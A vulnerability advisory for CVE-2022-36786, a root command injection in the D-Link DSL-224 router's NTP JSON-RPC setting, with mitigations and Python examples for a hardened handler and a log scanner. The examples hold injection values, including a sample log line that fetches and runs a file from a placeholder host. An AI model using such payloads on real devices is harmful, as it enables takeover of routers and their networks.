CVE-2022-36786: Post-auth RCE in D-Link DSL-224
DLINK - DSL-224 Post-auth RCE. DLINK router version 3.0.8 has an interface where you can configure NTP servers (Network Time Protocol) via jsonrpc API. It is possible to inject a command through this interface that will run with ROOT permissions on the router.
AI Analysis
Technical Summary
CVE-2022-36786 is a critical post-authentication remote code execution (RCE) vulnerability in the D-Link DSL-224 router. The advisory names firmware version 3.0.8; other versions may also be affected but are not confirmed by the source. The vulnerability arises from improper input validation in the router's JSON-RPC API interface used to configure Network Time Protocol (NTP) servers: a user-supplied NTP server value is passed into a command that the firmware runs as root, so shell metacharacters in that value become additional commands. An authenticated attacker with at least low privileges can inject arbitrary commands through this interface, which are then executed with root-level permissions on the device. This is classified under CWE-77 (Improper Neutralization of Special Elements used in a Command), indicating command injection. The vulnerability has a CVSS v3.1 base score of 9.9 (critical): network attack vector, low attack complexity, low privileges required, no user interaction, changed scope (a 9.9 with these metrics implies that the compromise extends beyond the API's own security boundary, here to the whole device and the traffic passing through it), and high impact on confidentiality, integrity, and availability. Exploiting this flaw allows an attacker to fully compromise the router, potentially gaining persistent control, intercepting or manipulating network traffic, deploying malware, or pivoting into internal networks. Although no public exploits had been reported in the wild at the time of this analysis, the high severity and ease of exploitation make this a significant threat to affected environments. The lack of available patches or firmware updates at the time of reporting increases the urgency for mitigation. The vulnerability's root cause is the unsafe handling of user-supplied input in a privileged API endpoint; the value should have been validated as a hostname or IP address and passed to the time-sync program as a discrete argument rather than through a shell.
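The following Python example is added here to illustrate the root cause described above and its fix; it is not D-Link firmware code, and the DSL-224's real JSON-RPC method and parameter names are not given on this page, so the method name "ntp.set", the "server" parameter and the use of ntpdate are assumptions. The vulnerable builder concatenates the user value into a shell line, the hardened path validates it as a hostname or IP address and builds an argv list that can be run without a shell.

```python
import ipaddress
import re
import subprocess
from typing import List

# --- vulnerable shape: user input concatenated into a shell line run as root ---
def build_ntp_command_vulnerable(server: str) -> str:
    # Anything the firmware hands to /bin/sh -c is parsed by the shell, so a value
    # such as "pool.ntp.org;id" runs "id" as root after ntpdate. Returned, not run.
    return f"ntpdate -u {server}"

# --- hardened shape ---
# One DNS label: 1-63 chars, alphanumerics and '-', not starting or ending with '-'.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(\.{_LABEL})*$")

def validate_ntp_server(server: str) -> bool:
    """Accept only a literal IPv4/IPv6 address or an RFC 1123 style hostname."""
    try:
        ipaddress.ip_address(server)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(server) is not None

def build_ntp_argv(server: str) -> List[str]:
    """Build the argument vector; each element is one argv entry, never shell-parsed."""
    if not validate_ntp_server(server):
        raise ValueError("invalid NTP server")
    return ["ntpdate", "-u", server]

def sync_ntp(server: str) -> int:
    """Run the sync without a shell (shell=False is the default for a list argv)."""
    return subprocess.run(build_ntp_argv(server), check=False).returncode

def handle_set_ntp(request: dict) -> dict:
    """Hardened handler for the assumed 'ntp.set' JSON-RPC method.

    Returns the argv it would execute instead of executing it, so the example runs
    offline; a real handler would call sync_ntp() and persist the setting.
    """
    rid = request.get("id")
    params = request.get("params") or {}
    server = params.get("server")
    if not isinstance(server, str) or not validate_ntp_server(server):
        # JSON-RPC 2.0 "Invalid params"; the rejected value is not echoed back.
        return {"jsonrpc": "2.0", "id": rid,
                "error": {"code": -32602, "message": "invalid NTP server"}}
    return {"jsonrpc": "2.0", "id": rid, "result": {"argv": build_ntp_argv(server)}}

if __name__ == "__main__":
    payload = "pool.ntp.org;id"
    print("vulnerable would run:", build_ntp_command_vulnerable(payload))
    print("hardened response:", handle_set_ntp(
        {"jsonrpc": "2.0", "method": "ntp.set", "params": {"server": payload}, "id": 1}))
```

The validation is an allowlist, not a blocklist of metacharacters: a blocklist has to anticipate every shell construct (`;`, `|`, `$( )`, backticks, newlines, and any the reviewer forgot), whereas "is this a hostname or an IP address" is a closed question. Passing a list to subprocess.run without shell=True is what makes the remaining value harmless even if validation were bypassed, since it reaches ntpdate as a single argument.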
Potential Impact
For European organizations, the impact of CVE-2022-36786 can be substantial, especially for small and medium enterprises (SMEs) and home office users relying on D-Link DSL-224 routers for internet connectivity. Successful exploitation can lead to full compromise of the router, enabling attackers to intercept sensitive communications, redirect traffic to malicious sites, or establish persistent backdoors. This can result in data breaches, intellectual property theft, disruption of business operations, and potential lateral movement into corporate networks. Critical infrastructure or organizations with remote sites using these routers may face operational outages or espionage risks. Given the router’s role as a network gateway, the integrity and availability of connected systems are at risk. The vulnerability’s post-authentication requirement means attackers need some level of access, which could be obtained via credential theft or phishing, making insider threats or compromised credentials a relevant concern. The absence of known exploits in the wild currently reduces immediate risk but does not eliminate the threat, as proof-of-concept code could emerge rapidly given the vulnerability’s severity.
Mitigation Recommendations
1. Immediately audit and restrict access to the router's management interfaces, ensuring that only trusted administrators can authenticate.
2. Change default and weak passwords on all DSL-224 devices to strong, unique credentials to reduce the risk of unauthorized access.
3. Disable remote management features if not strictly necessary, or restrict remote access via IP whitelisting and VPNs.
4. Monitor network traffic for unusual activity indicative of command injection or unauthorized configuration changes.
5. Segment networks to isolate DSL-224 routers from critical internal systems, limiting potential lateral movement.
6. Regularly check for firmware updates or security advisories from D-Link and apply patches as soon as they become available.
7. Implement multi-factor authentication (MFA) on management interfaces if supported to reduce the risk of credential compromise.
8. Conduct periodic security assessments and penetration tests focusing on router and network device configurations.
9. Educate users and administrators on phishing and credential security to prevent initial access.
10. Consider replacing DSL-224 routers with more secure alternatives if patching is not feasible or timely.
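Items 3 and 4 above (source restriction and monitoring for injection or unauthorized configuration changes) can be checked against request logs. The Python example below is added here and is not a D-Link tool: the log layout, the sample lines and the management subnet are constructed for the example, and the "ntp.set" method name is an assumption. It flags JSON-RPC calls from outside the admin network, any NTP configuration change for audit, and string parameters carrying shell metacharacters.

```python
import ipaddress
import json
import re
from typing import Iterator, List, Tuple

# Constructed sample log, not real DSL-224 output. Assumed layout per line:
# "<timestamp> <source-ip> <http-method> <path> <raw-json-rpc-body>"
SAMPLE_LOG = "\n".join([
    '2025-05-21T09:09:16Z 10.0.0.5 POST /jsonrpc {"jsonrpc":"2.0","method":"ntp.set","params":{"server":"pool.ntp.org"},"id":1}',
    '2025-05-21T09:10:02Z 10.0.0.5 POST /jsonrpc {"jsonrpc":"2.0","method":"ntp.set","params":{"server":"pool.ntp.org;wget http://198.51.100.9/a -O /tmp/a|sh"},"id":2}',
    '2025-05-21T09:11:40Z 203.0.113.7 POST /jsonrpc {"jsonrpc":"2.0","method":"system.status","params":{},"id":3}',
    '2025-05-21T09:12:13Z 10.0.0.5 GET /index.html -',
])

# Assumption: the only subnet from which administration is expected.
ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Characters that let a value escape a shell argument: separators, pipes, redirects,
# backticks, backslashes, newlines, and the start of $( ) or ${ } substitution.
SHELL_META = re.compile(r"[;&|`<>\n\\]|\$[({]")

def strings_in(obj) -> Iterator[str]:
    """Yield every string nested anywhere inside a decoded JSON value."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from strings_in(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from strings_in(v)

def analyze_line(line_no: int, line: str) -> List[Tuple[int, str]]:
    """Return (line_no, reason) findings for one log line; [] when nothing is notable."""
    findings: List[Tuple[int, str]] = []
    parts = line.split(" ", 4)          # body may itself contain spaces
    if len(parts) < 5 or parts[2] != "POST":
        return findings
    try:
        src = ipaddress.ip_address(parts[1])
        rpc = json.loads(parts[4])
    except ValueError:
        return findings
    if not isinstance(rpc, dict) or "method" not in rpc:
        return findings
    method = str(rpc["method"])
    if not any(src in net for net in ADMIN_NETS):
        findings.append((line_no, f"jsonrpc call from non-admin source {src}"))
    if "ntp" in method.lower():
        findings.append((line_no, f"NTP configuration change via {method}"))
    for value in strings_in(rpc.get("params")):
        if SHELL_META.search(value):
            findings.append((line_no, f"shell metacharacters in {method} parameter: {value!r}"))
    return findings

def scan_log(text: str) -> List[Tuple[int, str]]:
    out: List[Tuple[int, str]] = []
    for n, line in enumerate(text.splitlines(), 1):
        out.extend(analyze_line(n, line))
    return out

if __name__ == "__main__":
    for n, reason in scan_log(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

On the sample, line 1 produces only an audit entry (a legitimate NTP change from the admin subnet), line 2 produces the audit entry plus a metacharacter hit, and line 3 is flagged solely for its source address. Because this is a blocklist, it is a detection aid, not a control: the fix belongs in the device, and the audit entries are the part worth keeping even after a patch, since an unexpected NTP change is itself a sign of tampering.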
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium, Sweden, Austria
Technical Details
- Data Version: 5.1
- Assigner Short Name: INCD
- Date Reserved: 2022-07-26T00:00:00.000Z
- Cisa Enriched: true
- Cvss Version: 3.1
- State: PUBLISHED
Threat ID: 682d983cc4522896dcbee787
Added to database: 5/21/2025, 9:09:16 AM
Last enriched: 6/25/2025, 3:04:21 AM
Last updated: 7/28/2025, 5:42:56 AM